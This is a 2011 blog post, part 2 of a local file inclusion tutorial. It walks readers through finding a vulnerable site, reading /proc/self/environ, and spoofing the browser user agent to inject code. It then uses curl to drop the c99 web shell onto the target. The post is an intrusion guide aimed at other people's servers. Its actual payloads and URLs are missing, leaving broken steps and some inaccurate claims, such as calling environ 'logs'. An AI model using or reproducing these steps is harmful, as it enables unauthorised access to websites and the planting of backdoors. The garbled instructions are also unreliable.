Thursday, September 8, 2011

Local File Inclusion Tutorial Part 2 of 4

1. site vuln to lfi
2. php knowledge
3. browser Mozilla Firefox...

So... first you find some site vuln to lfi... now we must check if there are logs...
They are usually stored in /proc/self/environ... so just replace /etc/passwd with /proc/self/environ

If you get something like "DOCUMENT_ROOT=..." then it means you sucessfully found logs :D

Now,on that page you can find something like "HTTP_USER_AGENT"...
This value is usually our useragent(mozilla,netscape,etc) and now we must spoof it... but how?

Open a new tab in Mozilla,and type "about:config" (without quotes)...

Now,in "Filter" type: general.useragent.extra.firefox

You will get something like this:

Preference name                            Status     Type        Value
general.useragent.extra.firefox     default     string       Firefox/3.0.7
Now,double click on general.useragent.extra.firefox and replace "Firefox/3.0.7"

If everything is good you will get shell included... Otherwise,you will get errors... Mostly I was getting error "URL-File access disabled" or something like that... but using php I found another way...

Instead of typing
as useragent,type this:
Then load your vuln page like this:
Code: -o c99.php
So,lets review... basicaly,you are just adding &cmd= thing at the end of url...

Now,using "curl" command you will get content of shell in txt format and by using -o c99.php you will rename it to c99.php...

Now simply go to your site like this:
And that's all for now...cheers!

No comments:

Post a Comment

Certified Ethical Hacker Network Security Internet Security Computer Security Wireless Network Security